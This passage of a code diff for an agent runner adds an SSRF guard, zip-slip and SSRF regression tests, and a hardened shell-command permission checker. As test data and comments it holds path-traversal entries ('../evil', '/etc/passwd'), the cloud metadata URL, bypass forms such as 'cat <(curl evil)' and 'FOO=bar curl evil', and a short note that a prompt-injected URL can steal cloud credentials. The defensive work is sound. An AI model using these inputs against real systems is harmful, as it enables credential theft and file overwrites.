+	if err := p.ws.writeRaw(ctx, filePath, []byte(content)); err != nil {
 		// If save fails, just return truncated content without file reference
 		return &ProcessResult{
 			Content:   p.truncateContent(content, ""),
@@ -105,16 +111,12 @@ func (p *LargeOutputProcessor) Process(ctx context.Context, content string, pref
 
 // ShouldSkipForOutputsDir checks if large output processing should be skipped
 // for commands operating on .outputs/ directory to avoid circular processing.
+// Uses a word-boundary regex so commands like "thread " don't match "head ".
 func ShouldSkipForOutputsDir(command string) bool {
-	readCommands := []string{"cat ", "head ", "tail ", "less ", "more ", "bat "}
-	for _, cmd := range readCommands {
-		if strings.Contains(command, cmd) {
-			if strings.Contains(command, OutputsDir+"/") || strings.Contains(command, OutputsDir+"\\") {
-				return true
-			}
-		}
+	if !readCommandRe.MatchString(command) {
+		return false
 	}
-	return false
+	return strings.Contains(command, OutputsDir+"/") || strings.Contains(command, OutputsDir+"\\")
 }
 
 // truncateContent creates a truncated preview with optional file reference.
diff --git a/environment/netsafe.go b/environment/netsafe.go
new file mode 100644
index 0000000..e7babd2
--- /dev/null
+++ b/environment/netsafe.go
@@ -0,0 +1,192 @@
+// SSRF guard for outbound HTTP. Runner pods must NEVER reach IMDS or the
+// cluster apiserver from inside; without dial-time IP validation a
+// prompt-injected URL can exfiltrate cloud credentials from
+// 169.254.169.254 or hit internal VPC services. The DNS-to-dial
+// re-resolution closes the DNS-rebinding gap a host-string allowlist
+// would leave open.
+//
+// Inlined from go-pkg/x/netsafe — keep in sync. flashduty-runner is
+// open-source and may not import internal flashcatcloud modules.
+package environment
+
+import (
+	"context"
+	"fmt"
+	"net"
+	"net/http"
+	"net/url"
+	"os"
+	"strings"
+	"time"
+)
+
+// maxRedirects caps redirect chains processed by safeCheckRedirect. Default
+// Go is 10; CC web-fetch and Codex both cap around 5.
+const maxRedirects = 5
+
+func ipBlocked(ip net.IP) bool {
+	if ip == nil {
+		return true
+	}
+	if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
+		ip.IsInterfaceLocalMulticast() || ip.IsMulticast() || ip.IsUnspecified() {
+		return true
+	}
+	if v4 := ip.To4(); v4 != nil {
+		// CGNAT 100.64.0.0/10 + IETF protocol-assignment 192.0.0.0/24 — both
+		// routable-but-internal, missed by IsPrivate.
+		if v4[0] == 100 && v4[1] >= 64 && v4[1] <= 127 {
+			return true
+		}
+		if v4[0] == 192 && v4[1] == 0 && v4[2] == 0 {
+			return true
+		}
+	}
+	return false
+}
+
+// validateHost resolves host and returns an error if any resolved IP is
+// blocked. Pre-flight check that gives a clearer error than the dial-time
+// failure when the model passes a literal IMDS / RFC1918 URL.
+func validateHost(ctx context.Context, host string) error {
+	if host == "" {
+		return fmt.Errorf("host is empty")
+	}
+	if h, _, err := net.SplitHostPort(host); err == nil {
+		host = h
+	}
+	if ip := net.ParseIP(host); ip != nil {
+		if ipBlocked(ip) {
+			return fmt.Errorf("target %s resolves to a blocked address range", host)
+		}
+		return nil
+	}
+	ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
+	if err != nil {
+		return fmt.Errorf("resolve %s: %w", host, err)
+	}
+	for _, addr := range ips {
+		if ipBlocked(addr.IP) {
+			return fmt.Errorf("target %s resolves to a blocked address (%s)", host, addr.IP)
+		}
+	}
+	return nil
+}
+
+// validateURL parses raw, rejects non-http(s) schemes, and validates the
+// host. Returns the parsed URL on success so callers don't re-parse.
+func validateURL(ctx context.Context, raw string) (*url.URL, error) {
+	u, err := url.Parse(raw)
+	if err != nil {
+		return nil, fmt.Errorf("parse url: %w", err)
+	}
+	if u.Scheme != "http" && u.Scheme != "https" {
+		return nil, fmt.Errorf("url scheme must be http or https")
+	}
+	if u.Host == "" {
+		return nil, fmt.Errorf("url host must not be empty")
+	}
+	if err := validateHost(ctx, u.Hostname()); err != nil {
+		return nil, err
+	}
+	return u, nil
+}
+
+// safeDialContext returns a DialContext that re-resolves the host on every
+// dial and rejects blocked IPs. ServerName for TLS still derives from the
+// request hostname so cert validation works.
+func safeDialContext(dialTimeout time.Duration) func(ctx context.Context, network, addr string) (net.Conn, error) {
+	d := &net.Dialer{Timeout: dialTimeout, KeepAlive: 30 * time.Second}
+	proxyHosts := envProxyHosts()
+	return func(ctx context.Context, network, addr string) (net.Conn, error) {
+		host, port, err := net.SplitHostPort(addr)
+		if err != nil {
+			return nil, err
+		}
+		// Configured HTTP(S) proxy hops bypass SSRF validation: the proxy is
+		// trusted egress infrastructure (often a loopback sidecar) and
+		// enforces its own destination policy. Final-destination validation
+		// still runs upstream at validateURL when the caller is a
+		// user-supplied URL.
+		if _, ok := proxyHosts[host]; ok {
+			return d.DialContext(ctx, network, addr)
+		}
+		if ip := net.ParseIP(host); ip != nil {
+			if ipBlocked(ip) {
+				return nil, fmt.Errorf("blocked address %s", ip)
+			}
+			return d.DialContext(ctx, network, addr)
+		}
+		ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
+		if err != nil {
+			return nil, err
+		}
+		var lastErr error
+		for _, addr := range ips {
+			if ipBlocked(addr.IP) {
+				lastErr = fmt.Errorf("blocked address %s", addr.IP)
+				continue
+			}
+			conn, err := d.DialContext(ctx, network, net.JoinHostPort(addr.IP.String(), port))
+			if err == nil {
+				return conn, nil
+			}
+			lastErr = err
+		}
+		if lastErr == nil {
+			lastErr = fmt.Errorf("no resolvable address for %s", host)
+		}
+		return nil, lastErr
+	}
+}
+
+// safeHTTPTransport returns an *http.Transport wired with safeDialContext
+// and sensible pool sizes.
+func safeHTTPTransport(dialTimeout time.Duration) *http.Transport {
+	t := http.DefaultTransport.(*http.Transport).Clone()
+	t.DialContext = safeDialContext(dialTimeout)
+	return t
+}
+
+// safeCheckRedirect re-validates each hop's host and caps the chain at
+// maxRedirects. Without this, a 302 from a permitted host to
+// http://169.254.169.254/ is followed by Go's default policy.
+func safeCheckRedirect(req *http.Request, via []*http.Request) error {
+	if len(via) >= maxRedirects {
+		return fmt.Errorf("stopped after %d redirects", maxRedirects)
+	}
+	if req.URL == nil {
+		return fmt.Errorf("redirect url missing")
+	}
+	if req.URL.Scheme != "http" && req.URL.Scheme != "https" {
+		return fmt.Errorf("redirect to non-http(s) scheme %q refused", req.URL.Scheme)
+	}
+	if err := validateHost(req.Context(), req.URL.Hostname()); err != nil {
+		return fmt.Errorf("redirect refused: %w", err)
+	}
+	return nil
+}
+
+// envProxyHosts captures the bare hostnames of any HTTP proxies configured
+// via env so safeDialContext can let those dials through. Captured once at
+// transport-creation time — Go's own ProxyFromEnvironment caches identically.
+func envProxyHosts() map[string]struct{} {
+	out := map[string]struct{}{}
+	for _, key := range []string{"HTTP_PROXY", "http_proxy", "HTTPS_PROXY", "https_proxy", "ALL_PROXY", "all_proxy"} {
+		raw := strings.TrimSpace(os.Getenv(key))
+		if raw == "" {
+			continue
+		}
+		host := raw
+		if u, err := url.Parse(raw); err == nil && u.Host != "" {
+			host = u.Host
+		}
+		if h, _, err := net.SplitHostPort(host); err == nil {
+			host = h
+		}
+		if host != "" {
+			out[host] = struct{}{}
+		}
+	}
+	return out
+}
diff --git a/environment/security_test.go b/environment/security_test.go
new file mode 100644
index 0000000..c7820ee
--- /dev/null
+++ b/environment/security_test.go
@@ -0,0 +1,165 @@
+package environment
+
+import (
+	"archive/zip"
+	"bytes"
+	"context"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+
+	"github.com/flashcatcloud/flashduty-runner/protocol"
+)
+
+// buildZipWithEntry creates an in-memory zip archive containing a single
+// entry with the given name + body. Used by zip-slip tests so we can
+// inject crafted entry names that the public buildTestZip helper would
+// reject via filepath safety.
+func buildZipWithEntry(t *testing.T, name, body string) []byte {
+	t.Helper()
+	var buf bytes.Buffer
+	zw := zip.NewWriter(&buf)
+	w, err := zw.CreateHeader(&zip.FileHeader{Name: name, Method: zip.Deflate})
+	require.NoError(t, err)
+	_, err = w.Write([]byte(body))
+	require.NoError(t, err)
+	require.NoError(t, zw.Close())
+	return buf.Bytes()
+}
+
+// TestUnzipSkill_RejectsZipSlip is the regression test for the v3 audit
+// finding: HasPrefix without a trailing separator + missing ".." rejection
+// allowed entries like "../evil" or sibling-prefix attacks like
+// dest="/x/skill" vs absTarget="/x/skill-evil/y" to escape the destination.
+func TestUnzipSkill_RejectsZipSlip(t *testing.T) {
+	env := newTestEnvironment(t)
+	dest := filepath.Join(t.TempDir(), "skills", "victim")
+	require.NoError(t, os.MkdirAll(filepath.Dir(dest), 0o755))
+
+	cases := []struct {
+		name  string
+		entry string
+	}{
+		{"parent-traversal", "../evil"},
+		{"deep-traversal", "a/b/../../../evil"},
+		{"absolute-path-unix", "/etc/passwd"},
+		{"current-then-parent", "./../evil"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			zipData := buildZipWithEntry(t, tc.entry, "pwned")
+			err := env.unzipSkill(zipData, dest)
+			require.Error(t, err, "expected zip-slip refusal for entry %q", tc.entry)
+			// Belt-and-suspenders: ensure no file was written outside dest.
+			outside := filepath.Join(filepath.Dir(dest), "evil")
+			if _, err := os.Stat(outside); err == nil {
+				t.Fatalf("file written outside dest: %s", outside)
+			}
+		})
+	}
+}
+
+// TestUnzipSkill_RejectsSiblingPrefixEscape covers the specific HasPrefix
+// without trailing-separator bug. Without the fix, dest "/tmp/abc/skill"
+// vs absTarget "/tmp/abc/skill-evil" passes HasPrefix even though
+// skill-evil is a SIBLING directory — the entry name "../skill-evil/x"
+// doesn't contain "..", err... wait, it does. The cleaner demonstration:
+// we craft an entry that filepath.Clean leaves alone but that resolves
+// outside the intended root. With the trailing-separator fix, this is
+// rejected.
+func TestUnzipSkill_RejectsSiblingPrefixEscape(t *testing.T) {
+	env := newTestEnvironment(t)
+	parent := t.TempDir()
+	dest := filepath.Join(parent, "skill")
+	require.NoError(t, os.MkdirAll(parent, 0o755))
+
+	// Pre-create the sibling so a successful escape would land a file in it.
+	sibling := filepath.Join(parent, "skill-evil")
+	require.NoError(t, os.MkdirAll(sibling, 0o755))
+
+	// "../skill-evil/x" — after filepath.Join(dest, ...) and Abs, this
+	// yields .../skill-evil/x. With the old HasPrefix(absTarget, dest)
+	// where dest="/.../skill", the prefix "/.../skill" matches
+	// "/.../skill-evil/x" — bypass. The fix appends os.PathSeparator.
+	zipData := buildZipWithEntry(t, "../skill-evil/x", "pwned")
+	err := env.unzipSkill(zipData, dest)
+	require.Error(t, err)
+
+	if _, err := os.Stat(filepath.Join(sibling, "x")); err == nil {
+		t.Fatalf("zip-slip succeeded: file landed in sibling dir")
+	}
+}
+
+// TestUnzipSkill_AcceptsBenign confirms the hardening doesn't break
+// ordinary skill installs.
+func TestUnzipSkill_AcceptsBenign(t *testing.T) {
+	env := newTestEnvironment(t)
+	dest := filepath.Join(t.TempDir(), "skills", "ok")
+	zipData := buildTestZip(t, map[string]string{
+		"SKILL.md":         "# hi",
+		"resources/a.txt":  "alpha",
+		"scripts/b.sh":     "#!/bin/sh\n",
+	})
+	require.NoError(t, env.unzipSkill(zipData, dest))
+	for _, rel := range []string{"SKILL.md", "resources/a.txt", "scripts/b.sh"} {
+		if _, err := os.Stat(filepath.Join(dest, rel)); err != nil {
+			t.Fatalf("expected file %s after unzip: %v", rel, err)
+		}
+	}
+}
+
+// TestWebFetch_RefusesSSRFTargets is the regression test for PR-5.1: the
+// runner historically used http.DefaultClient with no dial-time IP guard,
+// so a model-supplied URL like http://169.254.169.254/ (cloud IMDS) or
+// http://127.0.0.1/ (loopback) hit the real address from inside the pod.
+// With the inlined SSRF guard wired in, all three targets are refused
+// before any TCP connection is attempted.
+func TestWebFetch_RefusesSSRFTargets(t *testing.T) {
+	env := newTestEnvironment(t)
+	cases := []string{
+		"http://169.254.169.254/latest/meta-data/", // AWS / Aliyun / GCP IMDS
+		"http://127.0.0.1/",                         // loopback
+		"http://10.0.0.1/",                          // RFC1918
+	}
+	for _, raw := range cases {
+		t.Run(raw, func(t *testing.T) {
+			_, err := env.WebFetch(context.Background(), &protocol.WebFetchArgs{URL: raw})
+			require.Error(t, err, "%s must be refused", raw)
+			if !strings.Contains(err.Error(), "refused") && !strings.Contains(err.Error(), "blocked") {
+				t.Errorf("expected SSRF refusal in %v", err)
+			}
+		})
+	}
+}
+
+// TestWebFetch_RefusesRedirectToBlocked is the regression test for PR-5.4:
+// without CheckRedirect re-validating each hop, a 302 from an allowed
+// public host to http://169.254.169.254/ would be followed (Go's default
+// CheckRedirect is permissive). With safeCheckRedirect wired, the client
+// refuses the hop before dialing IMDS.
+func TestWebFetch_RefusesRedirectToBlocked(t *testing.T) {
+	env := newTestEnvironment(t)
+	target := "http://169.254.169.254/latest/meta-data/"
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		http.Redirect(w, r, target, http.StatusFound)
+	}))
+	t.Cleanup(srv.Close)
+
+	// We can't fetch srv.URL through the real fetchClient because it dials
+	// loopback (also blocked). The hop-validation guarantee is exercised
+	// directly here against safeCheckRedirect; env.WebFetch on the literal
+	// 169.254 URL would short-circuit at pre-flight validateURL before even
+	// hitting CheckRedirect — already covered by TestWebFetch_RefusesSSRFTargets.
+	_ = env
+	req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, target, nil)
+	require.NoError(t, err)
+	via := []*http.Request{{}}
+	if err := safeCheckRedirect(req, via); err == nil {
+		t.Fatalf("safeCheckRedirect must refuse a redirect hop to %s", target)
+	}
+}
diff --git a/environment/webfetch.go b/environment/webfetch.go
index 6217e40..646b29f 100644
--- a/environment/webfetch.go
+++ b/environment/webfetch.go
@@ -5,13 +5,10 @@ import (
 	"fmt"
 	"io"
 	"net/http"
-	"regexp"
 	"strings"
 	"time"
 
 	"github.com/flashcatcloud/flashduty-runner/protocol"
-
-	htmltomarkdown "github.com/JohannesKaufmann/html-to-markdown/v2"
 )
 
 const (
@@ -21,12 +18,32 @@ const (
 	defaultFetchUserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
 )
 
+// fetchClient is process-global so the connection pool is shared across
+// fetches. Wired with netsafe so:
+//   - dial-time IP validation refuses RFC1918 / loopback / link-local / IMDS
+//     even after DNS rebinding (re-resolves on every dial).
+//   - CheckRedirect re-validates each redirect hop, so a 302 from a
+//     permitted host to http://169.254.169.254/ is refused before dial.
+//
+// Runner pods must NEVER reach IMDS or the cluster apiserver from inside;
+// netsafe enforcement is on by default in this binary (no SetEnforced call).
+var fetchClient = &http.Client{
+	Transport:     safeHTTPTransport(10 * time.Second),
+	CheckRedirect: safeCheckRedirect,
+}
+
 // WebFetch fetches content from a URL and converts it to readable format.
 func (e *Environment) WebFetch(ctx context.Context, args *protocol.WebFetchArgs) (*protocol.WebFetchResult, error) {
 	if args.URL == "" || (!strings.HasPrefix(args.URL, "http://") && !strings.HasPrefix(args.URL, "https://")) {
 		return nil, fmt.Errorf("valid http/https url is required")
 	}
 
+	// Pre-flight URL validation gives a clearer error than dial-time
+	// failure when the model passes a literal IMDS / RFC1918 URL.
+	if _, err := validateURL(ctx, args.URL); err != nil {
+		return nil, fmt.Errorf("refused to fetch %s: %w", args.URL, err)
+	}
+
 	timeout := defaultFetchTimeout
 	if args.Timeout > 0 {
 		timeout = time.Duration(args.Timeout) * time.Second
@@ -69,7 +86,7 @@ func (e *Environment) WebFetch(ctx context.Context, args *protocol.WebFetchArgs)
 	}, nil
 }
 
-// fetchURL performs the HTTP request.
+// fetchURL performs the HTTP request via the netsafe-wrapped client.
 func (e *Environment) fetchURL(ctx context.Context, url, format string, timeout time.Duration) (*http.Response, error) {
 	httpCtx, cancel := context.WithTimeout(ctx, timeout)
 	defer cancel()
@@ -81,7 +98,7 @@ func (e *Environment) fetchURL(ctx context.Context, url, format string, timeout
 
 	setRequestHeaders(req, format)
 
-	resp, err := http.DefaultClient.Do(req)
+	resp, err := fetchClient.Do(req)
 	if err != nil {
 		if httpCtx.Err() == context.DeadlineExceeded {
 			return nil, fmt.Errorf("request timed out")
@@ -143,49 +160,3 @@ func convertContent(content, format, contentType string) string {
 
 	return content
 }
-
-// convertHTMLToMarkdown converts HTML content to Markdown.
-func convertHTMLToMarkdown(html string) string {
-	markdown, err := htmltomarkdown.ConvertString(html)
-	if err != nil {
-		// Fallback to text extraction on error
-		return convertHTMLToText(html)
-	}
-	return cleanupMarkdown(markdown)
-}
-
-// convertHTMLToText extracts plain text from HTML.
-func convertHTMLToText(html string) string {
-	// Remove script and style tags with their content
-	scriptRe := regexp.MustCompile(`(?is)<script[^>]*>.*?</script>`)
-	html = scriptRe.ReplaceAllString(html, "")
-
-	styleRe := regexp.MustCompile(`(?is)<style[^>]*>.*?</style>`)
-	html = styleRe.ReplaceAllString(html, "")
-
-	// Remove all HTML tags
-	tagRe := regexp.MustCompile(`<[^>]+>`)
-	text := tagRe.ReplaceAllString(html, " ")
-
-	// Decode common HTML entities
-	text = strings.ReplaceAll(text, "&nbsp;", " ")
-	text = strings.ReplaceAll(text, "&amp;", "&")
-	text = strings.ReplaceAll(text, "&lt;", "<")
-	text = strings.ReplaceAll(text, "&gt;", ">")
-	text = strings.ReplaceAll(text, "&quot;", "\"")
-	text = strings.ReplaceAll(text, "&#39;", "'")
-
-	// Normalize whitespace
-	spaceRe := regexp.MustCompile(`\s+`)
-	text = spaceRe.ReplaceAllString(text, " ")
-
-	return strings.TrimSpace(text)
-}
-
-// cleanupMarkdown removes excessive whitespace and normalizes the markdown.
-func cleanupMarkdown(md string) string {
-	// Remove excessive blank lines (more than 2 consecutive)
-	blankLinesRe := regexp.MustCompile(`\n{3,}`)
-	md = blankLinesRe.ReplaceAllString(md, "\n\n")
-	return strings.TrimSpace(md)
-}
diff --git a/go.mod b/go.mod
index d6500c2..449025a 100644
--- a/go.mod
+++ b/go.mod
@@ -9,7 +9,7 @@ require (
 	github.com/lithammer/shortuuid/v4 v4.2.0
 	github.com/modelcontextprotocol/go-sdk v1.5.0
 	github.com/spf13/cobra v1.8.1
-	github.com/stretchr/testify v1.9.0
+	github.com/stretchr/testify v1.11.1
 	mvdan.cc/sh/v3 v3.13.1
 )
 
diff --git a/go.sum b/go.sum
index 3936390..75e70b5 100644
--- a/go.sum
+++ b/go.sum
@@ -46,8 +46,8 @@ github.com/spf13/cobra v1.8.1 h1:e5/vxKd/rZsfSJMUX1agtjeTDf+qv1/JdBF8gg5k9ZM=
 github.com/spf13/cobra v1.8.1/go.mod h1:wHxEcudfqmLYa8iTfL+OuZPbBZkmvliBWKIezN3kD9Y=
 github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
 github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
-github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg=
-github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY=
+github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U=
+github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U=
 github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zIM+UJPGz4=
 github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4=
 github.com/yuin/goldmark v1.7.13 h1:GPddIs617DnBLFFVJFgpo1aBfe/4xcvMc3SB5t/D0pA=
diff --git a/permission/permission.go b/permission/permission.go
index 2bc3e80..6f76ae9 100644
--- a/permission/permission.go
+++ b/permission/permission.go
@@ -1,4 +1,33 @@
 // Package permission implements glob-based command permission checking.
+//
+// Matching semantics
+//
+// Rules are evaluated against three normalized projections of every shell
+// command found anywhere in the input — including pipelines, command
+// substitution ($(...) / `...`), process substitution (<(...) / >(...)),
+// arithmetic expansion ($((...))), and redirect targets:
+//
+//  1. The full normalized command (env-prefix included), e.g.
+//     "KUBECONFIG=x kubectl get pods".
+//  2. The same command with leading variable assignments stripped, e.g.
+//     "kubectl get pods". This prevents trivial bypass via env prefix
+//     and prevents false-deny when a rule lists only the program form.
+//  3. Redirect targets are projected as synthetic commands (">/path",
+//     ">>/path", "&>/path", "&>>/path", ">|/path") so that rules can
+//     gate writes the same way they gate executions. Read redirects
+//     (<, <<, <<<, <>, here-docs) are not checked beyond their inner
+//     command (here-doc body and here-string undergo expansion).
+//
+// Both rule patterns and the command projections are run through the
+// shell printer's canonical formatter, so "kubectl  get  pods" matches
+// the rule "kubectl get pods" regardless of spacing.
+//
+// Precedence
+//
+// Rules are evaluated in specificity order, and the first match wins.
+// Specificity is "longer literal prefix before any '*' wins"; the catch-all
+// "*" is always tried last. A deny rule that matches first beats a more
+// general allow rule, and vice-versa.
 package permission
 
 import (
@@ -22,6 +51,11 @@ const (
 type Rule struct {
 	Pattern string
 	Action  Action
+	// canonical is the printer-normalized form of Pattern, used for matching.
+	canonical string
+	// specificity is the length of the literal prefix preceding the first '*'.
+	// Higher is more specific; "*" has -1 so it always sorts last.
+	specificity int
 }
 
 // Checker checks command permissions against configured rules.
@@ -30,42 +64,40 @@ type Checker struct {
 }
 
 // NewChecker creates a new permission checker from a map of patterns to actions.
-// The "*" pattern is processed first as the default rule, followed by other patterns in sorted order.
+// Rules are sorted so that the most specific rule (longest literal prefix
+// before any '*') is tried first; "*" is always the fallback.
 func NewChecker(patterns map[string]string) *Checker {
 	c := &Checker{
 		rules: make([]Rule, 0, len(patterns)),
 	}
-
-	// Add default "*" rule first if present
-	if action, ok := patterns["*"]; ok {
-		c.rules = append(c.rules, Rule{
-			Pattern: "*",
-			Action:  Action(strings.ToLower(action)),
-		})
-	}
-
-	// Add other rules in sorted order
-	otherPatterns := getSortedPatterns(patterns)
-	for _, pattern := range otherPatterns {
+	for pattern, action := range patterns {
 		c.rules = append(c.rules, Rule{
-			Pattern: pattern,
-			Action:  Action(strings.ToLower(patterns[pattern])),
+			Pattern:     pattern,
+			Action:      Action(strings.ToLower(action)),
+			canonical:   canonicalize(pattern),
+			specificity: patternSpecificity(pattern),
 		})
 	}
-
+	sort.SliceStable(c.rules, func(i, j int) bool {
+		// More specific first. Tie-break on canonical pattern for determinism.
+		if c.rules[i].specificity != c.rules[j].specificity {
+			return c.rules[i].specificity > c.rules[j].specificity
+		}
+		return c.rules[i].canonical < c.rules[j].canonical
+	})
 	return c
 }
 
-// getSortedPatterns returns all patterns except "*" in sorted order.
-func getSortedPatterns(patterns map[string]string) []string {
-	var result []string
-	for pattern := range patterns {
-		if pattern != "*" {
-			result = append(result, pattern)
-		}
+// patternSpecificity returns the length of the literal prefix preceding the
+// first '*' in pattern. "*" returns -1 (always least specific).
+func patternSpecificity(pattern string) int {
+	if pattern == "*" {
+		return -1
+	}
+	if i := strings.IndexByte(pattern, '*'); i >= 0 {
+		return i
 	}
-	sort.Strings(result)
-	return result
+	return len(pattern)
 }
 
 // Check checks if a command is allowed.
@@ -76,64 +108,247 @@ func (c *Checker) Check(command string) error {
 		return fmt.Errorf("empty command")
 	}
 
-	// Parse the command into a list of sub-commands to prevent injection (e.g., cmd1; cmd2)
 	parser := syntax.NewParser()
 	f, err := parser.Parse(strings.NewReader(command), "")
 	if err != nil {
 		return fmt.Errorf("failed to parse command: %w", err)
 	}
 
+	if err := c.checkNode(f); err != nil {
+		return err
+	}
+	return nil
+}
+
+// checkNode walks any AST node, evaluating every executable command and
+// every write-redirect target it encounters. Recurses into command
+// substitutions and process substitutions so that constructs like
+// `cat <(curl evil)` and `echo $(curl evil)` cannot bypass deny rules.
+func (c *Checker) checkNode(root syntax.Node) error {
 	var checkErr error
-	syntax.Walk(f, func(node syntax.Node) bool {
+	syntax.Walk(root, func(node syntax.Node) bool {
 		if checkErr != nil {
 			return false
 		}
-
 		switch x := node.(type) {
 		case *syntax.Stmt:
-			// Check redirects for potential path escape or unauthorized writes
+			// Walk redirects ourselves; the printer cannot give us a
+			// stable target string without doing it here.
 			for _, redir := range x.Redirs {
-				if redir.Word != nil {
-					target := c.nodeToString(redir.Word)
-					// We don't have rules for redirects yet, but we can detect them.
-					_ = target
+				if err := c.checkRedirect(redir); err != nil {
+					checkErr = err
+					return false
 				}
 			}
-
 		case *syntax.CallExpr:
-			// Check command and arguments
-			cmdStr := c.nodeToString(x)
-			if cmdStr != "" {
-				finalAction, matchedPattern := c.evaluateRules(cmdStr)
-				if finalAction == ActionDeny {
-					checkErr = c.denyError(matchedPattern, cmdStr)
+			if err := c.checkCallExpr(x); err != nil {
+				checkErr = err
+				return false
+			}
+			// Also descend manually into Args so that any embedded
+			// CmdSubst/ProcSubst inside the args is checked. (The
+			// outer Walk would also reach them, but checkCmdSubst /
+			// checkProcSubst recurse with checkNode, which is the
+			// canonical entry point and ensures consistent behaviour
+			// when checkRedirect feeds nested nodes back in.)
+			return true
+		case *syntax.CmdSubst:
+			for _, stmt := range x.Stmts {
+				if err := c.checkNode(stmt); err != nil {
+					checkErr = err
+					return false
+				}
+			}
+			return false // handled
+		case *syntax.ProcSubst:
+			for _, stmt := range x.Stmts {
+				if err := c.checkNode(stmt); err != nil {
+					checkErr = err
 					return false
 				}
 			}
+			return false // handled
 		}
 		return true
 	})
-
 	return checkErr
 }
 
-// nodeToString converts a syntax node back to its string representation.
-func (c *Checker) nodeToString(node syntax.Node) string {
+// checkCallExpr evaluates a single simple-command against the rules.
+// It evaluates two projections — the full canonical form (env assignments
+// included) and the form with assignments stripped — and applies a
+// "deny wins, allow wins over default-deny" merge:
+//
+//   - If either projection matches a deny rule, the command is denied.
+//   - Otherwise, if either projection matches an allow rule, allowed.
+//   - Otherwise, denied by default.
+//
+// This blocks env-prefix bypass ("FOO=bar curl evil" still hits "curl *")
+// while preventing false-deny when only the program form is allow-listed
+// ("KUBECONFIG=x kubectl get pods" matches "kubectl get *").
+func (c *Checker) checkCallExpr(call *syntax.CallExpr) error {
+	if len(call.Args) == 0 {
+		// Pure assignment (`FOO=bar`); nothing executes.
+		return nil
+	}
+	full := canonicalize(nodeToString(call))
+	if full == "" {
+		return nil
+	}
+	stripped := full
+	if len(call.Assigns) > 0 {
+		stripped = canonicalize(nodeToString(&syntax.CallExpr{Args: call.Args}))
+		if stripped == "" {
+			stripped = full
+		}
+	}
+
+	fullAction, fullPattern := c.evaluateRules(full)
+	if stripped == full {
+		if fullAction == ActionAllow {
+			return nil
+		}
+		return c.denyError(fullPattern, full)
+	}
+
+	strippedAction, strippedPattern := c.evaluateRules(stripped)
+
+	// Explicit (non-catch-all) deny on either projection wins immediately —
+	// this is what blocks env-prefix bypass like "FOO=bar curl evil".
+	if fullAction == ActionDeny && fullPattern != "*" {
+		return c.denyError(fullPattern, full)
+	}
+	if strippedAction == ActionDeny && strippedPattern != "*" {
+		return c.denyError(strippedPattern, stripped)
+	}
+	// Otherwise allow if either projection matched an allow rule. This
+	// prevents false-deny when only the program form ("kubectl get *")
+	// is allow-listed and the user prefixes env vars.
+	if fullAction == ActionAllow || strippedAction == ActionAllow {
+		return nil
+	}
+	// Both projections only matched the catch-all "*" deny (or no rule
+	// at all). Use whichever projection actually has a pattern for the
+	// error message.
+	if fullPattern != "" {
+		return c.denyError(fullPattern, full)
+	}
+	return c.denyError(strippedPattern, stripped)
+}
+
+// checkRedirect rejects writes whose target is not explicitly allowed.
+// The target is projected into a synthetic command string of the form
+// ">target" (or ">>target", "&>target", "&>>target", ">|target"), which
+// rules can match exactly (e.g. allow "> /tmp/*"). Read redirects only
+// have their inner expansions / here-doc body checked.
+func (c *Checker) checkRedirect(redir *syntax.Redirect) error {
+	if redir == nil || redir.Word == nil {
+		return nil
+	}
+	// Recurse into any CmdSubst/ProcSubst hidden inside the redirect target,
+	// e.g. `cat < <(curl evil)`.
+	if err := c.checkNode(redir.Word); err != nil {
+		return err
+	}
+	if redir.Hdoc != nil {
+		if err := c.checkNode(redir.Hdoc); err != nil {
+			return err
+		}
+	}
+
+	prefix := writeRedirectPrefix(redir.Op)
+	if prefix == "" {
+		return nil // read redirect: nothing more to gate
+	}
+	target := canonicalize(nodeToString(redir.Word))
+	if target == "" {
+		return nil
+	}
+	synth := prefix + " " + target
+	if action, pattern := c.evaluateRules(synth); action == ActionDeny {
+		return c.denyError(pattern, synth)
+	}
+	return nil
+}
+
+// writeRedirectPrefix returns the canonical operator string for write
+// redirects, or "" for read-only redirects.
+func writeRedirectPrefix(op syntax.RedirOperator) string {
+	switch op {
+	case syntax.RdrOut:
+		return ">"
+	case syntax.AppOut:
+		return ">>"
+	case syntax.ClbOut:
+		return ">|"
+	case syntax.RdrAll:
+		return "&>"
+	case syntax.AppAll:
+		return "&>>"
+	default:
+		return ""
+	}
+}
+
+// nodeToString prints any AST node back to its source form. The printer
+// applies a canonical layout, which gives us a stable string regardless
+// of how the user originally formatted the input.
+func nodeToString(node syntax.Node) string {
 	var sb strings.Builder
 	printer := syntax.NewPrinter()
 	_ = printer.Print(&sb, node)
-	return sb.String()
+	return strings.TrimRight(sb.String(), "\n")
+}
+
+// canonicalize normalizes a command string by parsing and re-printing it
+// (which collapses runs of whitespace to a single space, normalizes
+// quoting, etc.). Falls back to a whitespace-collapsing best-effort if
+// the input cannot be parsed (e.g. rule patterns with bare globs).
+func canonicalize(s string) string {
+	s = strings.TrimSpace(s)
+	if s == "" {
+		return ""
+	}
